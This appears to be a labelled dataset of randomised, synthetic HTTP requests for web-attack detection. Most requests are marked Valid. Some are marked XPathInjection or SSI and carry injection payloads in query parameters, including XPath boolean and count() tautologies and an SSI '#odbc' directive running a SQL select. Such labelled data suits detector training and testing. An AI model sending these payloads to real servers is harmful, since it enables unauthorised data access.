Authorization: Digest realm
Range: -48236,695-,-4
Referer: /Ecgjaa/uewwohe/egkt9/wosn7.doc
TE: gzip;q=0.2,gzip;q=0.9
Trailer: If-None-Match
User-Agent: eSsGxL5p1G http://www.uolw.gov
UA-CPU: Sparc
UA-Disp: 7483,031,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1053x1221
Via: 4.6 www.ruTislH.html
Transfer-Encoding: compress
Upgrade: W9cH/4.8, tlo/3.6, osrpo/7.5, hDTh/5.0, 4Lotcm/6.0
Warning: 907 42.53.177.88 "deshxruii" "Mon, 21 Jun 04 15:35:56 CET"
X-Forwarded-For: 85.38.105.235
X-Serial-Number: 055751373307057
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28975
Start - Id: 27695
class: Valid
GET /aMt/esDrstmtadow6i/thnuerhafsho0hu/.ViframeVoI4jnIYx/Ho/3HLtHaTtZocitq8ehehb/2gt2bwfsiiahividng.jpeg?8sntAsTa=inputdfdxhaEaes3%24eF&OkbmwChtaccescmd=u9h4etaoIt1e&slFltsre=dUGu_3KnqW&KI34kod7=008975733&7mse=902&tioodntsapao=nd2txdeleteOsibgsound&knY8_jbshutdownorffH=4&weeoednVicMor5q=re&eaNsosbaetota=It&Prneotfn=86978&flraavm=i%3Egt%5C4orB%7C0doaT HTTP/1.0
Host: 229.231.123.16:80
Connection: keep-alive
Accept: audio/basic
Accept-Charset: iso-8859-3, iso-8859-8-i;q=0.0, windows-1257, x-mac-japanese;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=458
Client-ip: 179.81.182.191
Cookie: gruhoc=4;ot3a7e0ejax=m4-cq9A;sthhsytst7o=5482916;phNia1rtl=ihwwp-npsall
Cookie2: $Version="09"
Date: Sat, 16 Apr 05 08:07:04 UTC
ETag: "mytNxrzipP7GNv4wnVi"
Expect: ee4re=lemXfen
From: bTem2@peiaee.st
If-Modified-Since: Wed, 25 May 05 22:16:21 CET
If-Unmodified-Since: Fri, 19 Feb 10 06:04:17 GMT
If-Match: "Y3MRp4HePR2R@MhbokQ"
If-None-Match: "fu4SR9jZK5uJcXoiCY"
If-Range: *
Max-Forwards: 559
MIME-Version: 9.8
Pragma: ri8ol=t6mi
Proxy-Authorization: NTLM dzlpbnVxaXRvbkE5MmNZMGV0YWF6YXFFdE9mdGNydHVvdWhabWNTQXp0Y2ViZXZo
Authorization: Digest nonce
Range: 19057-557
Referer: http://www.nzuGk6lO.net/iimUt/cmoel.wav
TE: gzip;q=0.6
Trailer: Range
User-Agent: bgwsq0pf/6.0.1
UA-CPU: PowerPC
UA-Disp: 9899,7417,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 576x948
Via: HTTP/0.3 230.252.2.188, 3.2 www.Teosaigc.jpeg
Transfer-Encoding: identity
Upgrade: 7tihjo/8.0, sel/5.7, yAiesw/1.4
Warning: 308 www.tixKj.jpg "aaearsdrrhaedma" 
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27695
Start - Id: 35806
class: XPathInjection
GET /7S3jG5rv6h-t/uhoihemdhc2pz/1UrCwNubKnNs2f./tsabekml2rwloSeO2/opjUb/dTZ_BX85pt6sjCbS/sm2uthZIabNILsaenbsw/thheharuiiA3dag/sYfgceslcem.tiff?hrooda6arRe=7815930&lr=d&elns=og%29He5fana%3F&XNupdateBY5ocmdUpt=abcXJDTcP-&z9-maHGzUoCb=889&9EBTmunionYTUC=sszoY%27+or+6+%3C+++++count%28path%2Fchild%3A%3A*%29++++or+++++%27eeuel%27+%3D++++%27 HTTP/1.0
Host: 118.167.0.116
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: 6tift-ri2nb;q=0.7, tlhesie-3tt;q=0.6, u1epahr-tns3Oisf;q=0.9, 4Hie-krcjoeki
Cache-Control: no-store
Client-ip: 25.4.155.47
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Fri, 01 Jan 10 19:45:35 CET
ETag: "LurqXpLgf.Ql2zH"
Expect: lteNH=ieiARts;setA=dgrtRD
From: gH0ez@Sireoah.fr
If-Modified-Since: Tue, 14 Oct 08 12:08:59 UTC
If-Unmodified-Since: Mon, 30 Aug 04 10:26:00 CET
If-Match: "lMuwsZvm4g4Xtf9"
If-None-Match: *
If-Range: Tue, 18 Jul 06 02:30:01 UTC
Max-Forwards: 7
MIME-Version: 0.7
Pragma: txP=lostFv
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Range: 205-0247
Referer: http://eeMye.de/buHya/fosmibtn/4ofRlb4n.pl
TE: trailers
Trailer: Cache-Control
User-Agent: rSvDHZiX http://www.xHS3.be
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: gzip
Upgrade: hljiT/5.4, axrst/8.8
Warning: 282 www.eOXt.htm "312bFgsaSoacoe" 
X-Forwarded-For: 43.11.206.228
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35806
Start - Id: 33366
class: Valid
PUT /qW7/xOannlnbieq2et1.shtml? HTTP/1.1
Content-Length: 147
Content-Language: e1her
Content-Encoding: identity
Content-Location: /ay5o.asp
Content-MD5: TmV0eWVvZmVhcmdsczltUw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jan 06 22:51:13 UTC
Last-Modified: Mon, 05 Oct 09 07:16:49 CET
Host: www.seoarii6ps.de
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-chinesetrad, euc-kr
Accept-Encoding: identity;q=0.9, deflate;q=0.2
Accept-Language: rium-splOl
Cache-Control: max-age=2566
Client-ip: 254.65.22.106
Cookie: n18i8xeOh=asn;Ccytbjsrarsnd=nN7TBNr-C;aoUoEdmkez5uneh=1;tdemse7t=840109;unOlcIhar=cpdzv
Cookie2: $Version="800"
Date: Tue, 07 Sep 04 01:44:42 CET
ETag: "41ORVJECYg7W.bpT18U"
Expect: 100-continue
From: hlfhpso@wntnhuih.org
If-Modified-Since: Tue, 27 Apr 04 15:38:24 UTC
If-Unmodified-Since: Sat, 08 Nov 08 05:43:11 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Oct 07 12:19:55 CET
Max-Forwards: 6905
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic ZWlnck1oZXQ6eXNVbnZyZQ==
Authorization: Digest cnonce="Ets6nc"
Range: -6
Referer: /m4fxrie/opsD2g/dchutlrs/r5g7hao.asmx
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: aVAtp6 http://www.YtePl.com
UA-CPU: MIPS
UA-Disp: 987,602,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2101x785
Via: 8.8 www.nEEva.png, 6.6 www.eetleiho.tiff
Transfer-Encoding: identity
Upgrade: eHsifo/4.6, g78t/9.8, eaiaee/4.0, yezrfl/2.3, e0h/0.5
Warning: 083 www.fspp3om.jpeg "iC94etihocgcee3e" 
X-Forwarded-For: 113.32.119.185
X-Serial-Number: 93235551323019151899
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oiqaemterX=037839&Aarzs4eeho=00&cnnhzxjo=suds8cew5wroHHbet&emsc=sa6O&9Ilraotis8mhhe=3&ouuja9t=6529234391&naeeft=28937914&57tedmrUtokbe1=Raosdwhereg

End - Id: 33366
Start - Id: 40782
class: SSI
GET /mnh7/geGTcncexfpilT.asp?lsE=e+leoahkI%24ueo&2Cukoelh9too=ipaccess_log9oy%40izio%40r&idfttEihtendiah=82862686&sLalaG=%3C%21--+++%23odbc++++connect%3D%22zaeFsmi%2Csd2Na%2Ckoo%22++++++++statement%3D%22select++*+++++from+++im%22--%3E&rudedfraitTght=nr%29%2B&HH.RsamxxT=neswye&5o=phpsamg&aodon=%3An9mt6&adekUotwmt1tf=reeclunveuys%27&omE2beimhaeoom=tei&eie7t05ppvgjl=050&acayn0ptbrIse=eii&Mueh8gdmt2vi=oaishce&tfemstncrlar=dehle9asb&rocnlhemtaRo7r=tt%25 HTTP/1.0
Host: www.st7ikei.org:80
Connection: close
Accept: video/*, video/quicktime, audio/*;q=0.8
Accept-Charset: iso-8859-1;q=0.7, shift_jis
Accept-Encoding: *;q=0.9
Accept-Language: *
Client-ip: 78.148.170.246
Cookie: cxgzeocnEe1v7rf=sh 5vrnadAs7snd;rmerUdies7i=?;GsrdsvEh1ca=hstety;tsirnEinm=108;hrP=12602782
Date: Fri, 17 Dec 04 08:53:00 GMT
ETag: "g8BPUE.bYxda8s-n2"
If-Modified-Since: Sun, 07 Mar 04 02:47:18 GMT
If-Unmodified-Since: Mon, 23 Aug 04 19:05:01 GMT
If-None-Match: *
If-Range: "wuFa@D5QvVREvWeYw"
Max-Forwards: 614
Pragma: oba=e
Proxy-Authorization: Basic bmVoc2o6bDlxb2FsdA==
Authorization: Digest algorithm=MD5
Range: 317784-4,80-130,625-44564
Referer: /ebnmpe/tmUrT/dEEHeoe/tth6e3jp.tiff
TE: trailers
User-Agent: Mozilla/1.5 (compatible; Konqueror/2.9; Open BSD i386; aHait; l4dota0tri; Ilretlte)
UA-Pixels: 593x4712
Via: FTP/9.1 www.Ilrsrsti.tiff, amn/6.1 www.neenrna6.htm
Transfer-Encoding: identity
Upgrade: vgs/0.3
X-Serial-Number: 87018152344
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40782
Start - Id: 31894
class: Valid
GET /iIQZv3heCv68VWMDw0S1/oMum4K04tUiM7/o_OFoT1i81Zmsh/oged/hYMToZ/iiJl.z3yf/hCJADw4ES@k/dn/oyhmf3tgohgynh/rh_HF.-QKD29zK/6_c3fIz/HstEbaduooaoNnGidh4.tiff? HTTP/1.0
Host: 233.41.108.65
Connection: close
Accept: application/*;q=0.2
Accept-Charset: x-mac-arabic, euc-tw, x-mac-arabic;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 96.93.14.227
Cookie: PnsnawNanNce=asanrnaaylidTs3;detEte=tanbtoe4m3drhNel
Cookie2: $Version="254"
Date: Fri, 07 Jan 05 03:26:55 CET
ETag: W/"ZZYY7JoP4x.Y.wset"
Expect: ziuMb6
From: blt2@eee1eeNa.st
If-Modified-Since: Sun, 16 Apr 06 19:43:14 CET
If-Unmodified-Since: Tue, 16 Aug 05 02:27:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9495
MIME-Version: 2.4
Pragma: imrs='ssct'
Proxy-Authorization: Digest algorithm=Eaeos
Authorization: cplyE ol2Lgc=rna0
Range: 581-,06-0,27-
Referer: /pwh2sl/sR2m/tpn6pW.jpeg
TE: deflate,trailers,trailers
Trailer: Expect
User-Agent: tan40t9ttntrs
UA-CPU: StrongARM
UA-Disp: 280,3333,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 154x250
Via: nebT/0.2 51.60.36.232, HTTP/7.9 7.2.16.87, 9.4 www.reukrat.css:94246
Transfer-Encoding: identity
Upgrade: znl/9.4, enhOao/1.7, esna/5.0
Warning: 978 44.130.75.56 "tySnc" 
X-Forwarded-For: 66.190.156.36
X-Serial-Number: 69375200108238652611
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31894
Start - Id: 12991
class: Valid
GET /mWO/includeyV@7br.nbhx/tfEdmecd3ehifqiirety/tzq4Joci/akzce3a-AN@/hXCcWt/dlqebeon9h2irew6tm/vbscriptperlm/usr8LPFJz7Q5MrS546/e_UmSb4ac@YQ/sjGEBb41.htm?Zopen2J_=wAQ%40BOEjS&LpJEU=wp-wbint&scriptIAweS=0107657&r9Rr.=tqRd3r&N7cltire134=79 HTTP/1.1
Host: 122.16.92.164
Connection: keep-alive
Accept: application/zip;q=0.2, audio/*;q=0.9
Accept-Charset: cp-932;q=0.1
Accept-Encoding: compress;q=0.6, identity;q=0.7, compress;q=0.6, deflate;q=0.3
Accept-Language: *;q=0.0
Cache-Control: max-stale=171
Client-ip: 36.28.31.243
Cookie: gactb5ierhai3=rimcopybodydiEe1N;th8tlhoOriixgi=D2n;slc0geofEh8=4~;
Cookie2: $Version="139"
Date: Mon, 20 Dec 04 12:44:44 UTC
ETag: W/"@dtr3ZETT_u3A8ZN_"
Expect: iltbdt
From: picsvpm@izhyigm.biz
If-Modified-Since: Sun, 11 Oct 09 01:30:00 GMT
If-Unmodified-Since: Wed, 01 Feb 06 01:10:08 GMT
If-Match: "NJqXSc-8j1yVa@-f"
If-None-Match: "oRrungw30jF8yAkQu"
If-Range: "V0PUzwentEKNeP5Cf3vc"
Max-Forwards: 4
MIME-Version: 8.0
Pragma: tnR=edcEiesm
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: rp7j 0nfsa=audw
Range: 459-
Referer: http://f9fs.uk/19ft/stajcw3/l7rtdry.sh
TE: gzip,deflate
Trailer: Range
User-Agent: Mozilla/1.0 (X11; U; Solaris 9.8; R3-t1; rv:1.0.5) Gecko/79143648
UA-CPU: MIPS
UA-Disp: 8913,250,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 011x9947
Via: 5.6 127.223.120.2, 3.1 224.202.54.208, 5.0 www.eunTh.js
Transfer-Encoding: identity
Upgrade: eir/2.5, te5s/6.4
Warning: 479 www.eorrw.html "seteahmS" 
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 48761623
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12991
Start - Id: 35884
class: XPathInjection
GET /2szg4w1X/bsanc5agUn2eIetdPTgp/ue1wiewinwsneeatse.html?llentlazcuemm=0ttRr&h3HaVy3PzX=758&ohneXsgu=ew&7axtEadidExtxbf=7o&teeihs=t6ig+o+ciy%268pL&olsdM8vheisah=qyetofpu2ep&tv5kesmsTEbo=tnmuen5t&5easaFuO=xni&c7eghoje=i%2Fzieg%2Faahq%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D93%5D+++or+++%27wteo3%27%3D+%27&elinuthtaetjnmi=systemadinmcOr HTTP/1.0
Host: 255.92.237.249
Connection: keep-alive
Accept: text/*
Accept-Charset: windows-874, windows-1252;q=0.7, us-ascii, iso-2022-jp, x-mac-turkish
Accept-Encoding: compress, gzip;q=0.3, compress, deflate;q=0.3
Accept-Language: tt-Aoa;q=0.1
Cache-Control: min-fresh=23756
Client-ip: 204.135.13.34
Cookie: l0ysttdtsneOyoe=tquPwP
Cookie2: $Version="462"
Date: Sun, 20 Mar 05 12:09:11 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: elnuss@neAdimn.fr
If-Modified-Since: Mon, 11 Aug 08 11:57:40 CET
If-Unmodified-Since: Sun, 09 Dec 07 04:05:13 CET
If-Match: *
If-None-Match: "hwzsS1.sHLWWGb4Qyrv6"
If-Range: Thu, 24 Feb 05 15:05:27 CET
Max-Forwards: 153
MIME-Version: 8.2
Pragma: hasrLrae='nr6'
Proxy-Authorization: Digest nonce
Authorization: Basic SW9kY241cW06d3JydA==
Range: 3-18807,30473-219,305975-44534
Referer: http://www.ceOidno.uk/oAAnlcr/Dtabe1v.mpeg
TE: trailers
Trailer: Via
User-Agent: ukya2tseib (7ggpcvFu)
UA-CPU: x86
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color16
Via: FTP/2.1 www.stwb.css:8, 6.8 96.42.220.153, 5.5 108.14.113.230:3072
Transfer-Encoding: gzip
Upgrade: lcMte/6.9, el3/2.6, eorKne/2.7, ennt/1.8
Warning: 976 www.IFve.html:3865 "sMusnctqhhiy2" "Tue, 15 Dec 09 23:16:42 UTC"
X-Serial-Number: 160475
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35884
Start - Id: 18553
class: Valid
GET /aLC/1b1ynullVIiXT1KJ/s-rzkG.uqixk/luhbbEG/avo7IdenhtbhTeRior.js?meublfszse7Peh=39&3e=twHSS_Kl&ad=9&deCcu1ibdldau=prnbeeiuuAdrsMr&cshutdown@To2sk=0205520&eeele6ni6e=Ls%3F&m5hh5dhT=bgl&tSt=jlr8&ocMlE=00169515 HTTP/1.0
Host: 10.41.147.138
Connection: keep-alive
Accept: audio/*;q=0.5, application/zip;q=0.4
Accept-Charset: windows-1255;q=0.0, windows-1253;q=0.0
Accept-Encoding: compress, compress, compress;q=0.1
Accept-Language: ulsye-F, nwr-io;q=0.1, eYDe-Fhtnt;q=0.7
Cache-Control: min-fresh=3
Client-ip: 90.202.52.93
Cookie: naeeeses=:r;psIpasswdkESAdA=oU-1oW0l
Cookie2: $Version="26"
Date: Thu, 30 Mar 06 19:19:02 GMT
ETag: W/"juaO2e_9BtfYx.ar"
Expect: pEbr=m5Fy;tsoAplxR=eieeotia
From: 2dHy@nMyaaotcd.gov
If-Modified-Since: Thu, 27 Sep 07 14:14:31 GMT
If-Unmodified-Since: Tue, 04 Sep 07 04:36:10 UTC
If-Match: *
If-None-Match: "AdpOwPxQlI7giESOHP"
If-Range: *
Max-Forwards: 5440
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic ZTByZTpzYVR1aWk=
Authorization: Digest realm
Range: 46-,56-
Referer: /tSte/glah4r/liaihi/dyt3re.asp
TE: trailers,deflate,chunked
Trailer: If-Match
User-Agent: Mozilla/1.5 (X11; U; Linux i586 9.4; sh-od; rv:0.4.3) Gecko/28347326
UA-CPU: Sparc
UA-Disp: 973,9699,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5538x3966
Via: 5.2 www.2fTi.tiff
Transfer-Encoding: deflate
Upgrade: eeyva/6.8
Warning: 513 176.80.122.103 "ratxspswAeSs" "Sat, 28 May 05 09:22:11 GMT"
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 6081025334280636009
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 18553
Start - Id: 28150
class: Valid
GET /ee5nK.bs80LHpbnM0jG.gif? HTTP/1.1
Host: www.T1Kianwjai.st:2285
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, iso-8859-15, macintosh;q=0.4, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 173.187.56.113
Cookie: CA8rreplaceU=e1L7ihk:obgsoundeb;rR8tordtlea=de5o%;I@echos-8GmtF=bxjcVX
Cookie2: $Version="3"
Date: Tue, 14 Jul 09 05:44:21 UTC
ETag: "2mjFVHppkCJnoaVqOar"
Expect: o1hE=3lnMdu;ne1eonns=D8g3
From: hsdsttm4@ahcqn.net
If-Modified-Since: Sun, 23 Jan 05 04:18:12 CET
If-Unmodified-Since: Thu, 04 Mar 10 10:09:20 UTC
If-Match: *
If-None-Match: "L0QIQBwOSqfZc-ZD5v2"
If-Range: *
Max-Forwards: 245
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM MWlOZWR1cm9kb29rb2Fldm9zeW9ydGFMaXVnZWNybmVGbXJlb2NOMWpyZGlnNVNv
Authorization: Basic M2ZyclRvTm86VDdJbHRleQ==
Range: 1-,700067-,-09153
Referer: http://ewkw.fr/ulssdsrc/n7EeO6rd/e0ttetnl.aspx
TE: gzip;q=0.2,trailers,deflate;q=0.5
Trailer: Pragma
User-Agent: Mozilla/3.8 (compatible; MSIE 7.9; Open BSD i586; OrghUzSetu)
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4261x691
Via: HTTP/4.0 www.e95N.css:6, sa1qee/8.2 www.isrohusr.tiff
Transfer-Encoding: identity
Upgrade: imy6ei/5.1, rfee/6.2, egoe/6.4, tizE/1.8, 9wsmHe/9.2
Warning: 403 120.108.130.1 "ai8tfnnlo4okAislt" "Wed, 10 Jan 07 06:01:10 GMT"
X-Forwarded-For: 53.152.98.70
X-Serial-Number: 28548763
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28150
Start - Id: 17589
class: Valid
GET /bNmf/yL7zGSxkp/eemzhh9tesMknp5/vpXeiNgo5ul8e/tqE7I5cu/xjst2seyLOqe.php3?gep1un=bEod40&aTifEab6reDm=9 HTTP/1.0
Host: www.elqtho.fr
Connection: llt8rca
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip
Accept-Language: cel-ehdris;q=0.0, l-iciet4, ails-sap;q=0.8
Cache-Control: only-if-cached
Client-ip: 177.96.5.81
Cookie: 22nhreii=4483433;tls=leliG;yanR=nPF;9rds5e=8dp;_TTgCainputDXF=ichTtFG
Cookie2: $Version="17"
Date: Sun, 06 Aug 06 01:47:08 CET
ETag: "CAjY4qra185GoVI_"
Expect: sdtt=lkhla
From: ui8ro@etvh.org
If-Modified-Since: Tue, 17 Jan 06 02:59:43 CET
If-Unmodified-Since: Sat, 31 Oct 09 23:30:23 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM aWltYWZ2cmlpcmljZm1haTJuNjF0OW5zb2VlaWVlbmFkdnNvSG5uRGls
Authorization: Digest nc=BB724D59
Range: 22389-71,-169,-0
Referer: /iyegt/debndt/tBolm.mdb
TE: trailers,gzip,trailers
Trailer: Date
User-Agent: teo8hfF3s/9.5
UA-CPU: 68000
UA-Disp: 611,8955,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: Nshedt/8.6 141.179.182.62, FTP/4.4 215.58.245.9:4076, 9.4 www.l4otrree.js
Transfer-Encoding: deflate
Upgrade: tRl8hm/4.0
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 108.95.130.193
X-Serial-Number: 2432854713
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17589
Start - Id: 33324
class: Valid
PUT /FDqNfromLnS.jMVMB/rdT/nagavsgy61o6tgirsfrs/cfognSh/rd6/eroPHz_DVr/Nm42fIoB.pl? HTTP/1.1
Content-Length: 30
Content-Language: rnwo,vat6
Content-Encoding: compress
Content-Location: /nhtR/tNssef/efsaAewt/ut3pet9/rcjixosw.php4
Content-MD5: N2xlTzBsZVJoaTM3YXNFcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Dec 05 07:12:38 CET
Last-Modified: Fri, 25 Jul 08 20:13:42 GMT
Host: www.t8e6.fr:4346
Connection: keep-alive
Accept: application/x-tar;q=0.9, image/*;q=0.0, audio/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4797
Client-ip: 29.172.196.230
Cookie: sidie=odry6b40W);pvgtiTy=srk
Cookie2: $Version="03"
Date: Sun, 17 May 09 12:24:49 UTC
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: hTuga
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Thu, 25 Oct 07 24:50:38 GMT
If-Unmodified-Since: Sun, 20 Aug 06 13:44:02 GMT
If-Match: "nMIXg@FZIvjktYpTNuk"
If-None-Match: *
If-Range: "nOonB4906D@0Hfvpea1"
Max-Forwards: 139
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest response="82Aefeab6F6E793D521a04Cc9Ec2D0A4"
Authorization: Digest nonce
Range: 6-,39-,43-
Referer: /B6okqaw/b6qA3/ktei.sh
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 2.7; eh-he; rv:3.3.0) Gecko/62793720
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1181x772
Via: 6.7 www.edresc.jpg:561, 0.8 www.weAp.htm, FTP/1.0 190.222.77.247
Transfer-Encoding: compress
Upgrade: erraNN/6.8, erpl/9.7
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 6047064936
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

ejOqnexr0weeNt=tatemammdns2ist

End - Id: 33324
Start - Id: 9354
class: Valid
GET /bUS21gp7.lH/eunaqe0u3/LAesu8l/ottirdoeuiaedmleaeha/rgfuHwindow.open0a/ee.js? HTTP/1.0
Host: 97.151.167.121:5401
Connection: jgc8ofbi
Accept: */*
Accept-Charset: iso-8859-8, euc-cn;q=0.7, windows-1253, iso-8859-1;q=0.5, gb2312;q=0.4
Accept-Encoding: identity, gzip, compress, compress
Accept-Language: *;q=0.7
Cache-Control: min-fresh=21370
Client-ip: 66.193.65.107
Cookie: ohtzhIsqts=4;ttanttag7s=mQpRresvbhw
Cookie2: $Version="545"
Date: Sat, 14 Feb 04 21:23:21 CET
ETag: "ylCyZG79u0xBFHA1Lc"
Expect: gEwhEed=lqmenxb
From: psuoabb@iAeo.fr
If-Modified-Since: Sun, 16 Dec 07 12:34:56 CET
If-Unmodified-Since: Tue, 18 Nov 08 18:19:11 CET
If-Match: *
If-None-Match: "Ao3eGAoHl4Ett-MoHem3"
If-Range: *
Max-Forwards: 597
MIME-Version: 3.5
Pragma: alhb86='iLn'
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Basic bmVtSTQ6bjJ0c3ls
Range: -72,-53033,-11
Referer: http://www.h3btite.it/fdiaHes/Hfero/j0ls/lhagt.php3
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 2.3; to-ua; rv:1.0.7) Gecko/78309756
UA-CPU: Sparc
UA-Disp: 6680,235,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4908x484
Via: 6.6 178.62.215.248
Transfer-Encoding: deflate
Upgrade: ux2f/3.4, ehanei/4.1, cot/1.3, eEmgt/0.8, nBt/6.1
Warning: 915 www.usatd.css "HmaH" 
X-Forwarded-For: 237.90.148.222
X-Serial-Number: 169179883
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9354
Start - Id: 27244
class: Valid
GET /nti6/osyonsbrHthp9iw1hns/euexw3Kw.mdb?uRetehsswlOtwyd=98552305&y4ysn=1351312&nfttotAhstgei=4&SrrtadaSsddj7p=e%7E2bm4mToaah+td%3Ci%24&BIxnk0=te%3Dt+6&dinsertDBup.H=isvmr4p&Rz1Ywvxp_nAnullMU=hyq&wl1Snph-positionKv=tensLs%29ibt+toptc&71D_D1=698165&oe3ew=vt9 HTTP/1.1
Host: 78.59.108.46
Connection: h0nrtxo
Accept: video/quicktime;q=0.2, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, deflate, gzip;q=0.2, gzip;q=0.9, compress;q=0.6
Accept-Language: iSPp-n;q=0.3, h-aedarw, taotgin-v0nhawmn;q=0.4, s3up-kupa6
Cache-Control: no-transform
Client-ip: 38.30.205.231
Cookie: elwcLgPSGQc=786
Cookie2: $Version="95"
Date: Sat, 11 Nov 06 17:38:43 CET
ETag: W/"SeW0fRw1d9rw8@@dnSl"
Expect: ynFzt4=xhhd0leo;eegu
From: rted@eseO4iri7.net
If-Modified-Since: Tue, 24 Nov 09 17:46:11 UTC
If-Unmodified-Since: Sat, 03 Oct 09 11:01:54 GMT
If-Match: "Up_sVD86P21h5zdB"
If-None-Match: "tt5S79yl7LzB_mSk"
If-Range: "BBAJ7WS-jjdcOe2"
Max-Forwards: 541
MIME-Version: 5.4
Pragma: ricwa8rn=mE
Proxy-Authorization: NTLM YXBzZmxob2xJYWVhc3lsb3NzbHNzcmNvc25tZW55b2hvemV1aGVCNnRw
Authorization: Digest nonce
Range: 222622-977,941925-007
Referer: /nosSH.jpeg
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 3.6; ea-sn; rv:0.6.0) Gecko/50987538
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8847x8709
Via: eame/0.5 53.232.105.207, ymv/4.1 www.atu2efee.shtml
Transfer-Encoding: deflate
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 037 www.tnd5.shtml "oufsndu0q99i3Mpd6" 
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 03585265611938930040
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27244
Start - Id: 12856
class: Valid
GET /Ybp_C/2rmbH/iwU_/Edcesao/homeqy0zjcv/a6isbl.mspx?6nota9not=cHkdc&ntrroEc=aln%7E1lumch&likeHPr=eegqrnudhn&i6Z=68790544&DCuOGGUYT@=abhaving%261i0e&iyiu1Oitelnrb=5+&hxriorebuws=eip&mudpaEdng9nE=ro4eg%26cwi%7Ein%5B&diy=e%24m+ghehnsermcs&nFxvmghusmu=0018180 HTTP/1.0
Host: 67.74.250.155
Connection: tcnnbsrc
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-e9, tii-ait;q=0.3
Cache-Control: only-if-cached
Client-ip: 184.111.50.185
Cookie: eji1a=191170;mwS=ts
Cookie2: $Version="98"
Date: Thu, 11 Sep 08 09:50:32 GMT
ETag: "WU-5gxwcCX1t42G2qlC"
Expect: 100-continue
From: iirE@eyRmP2.biz
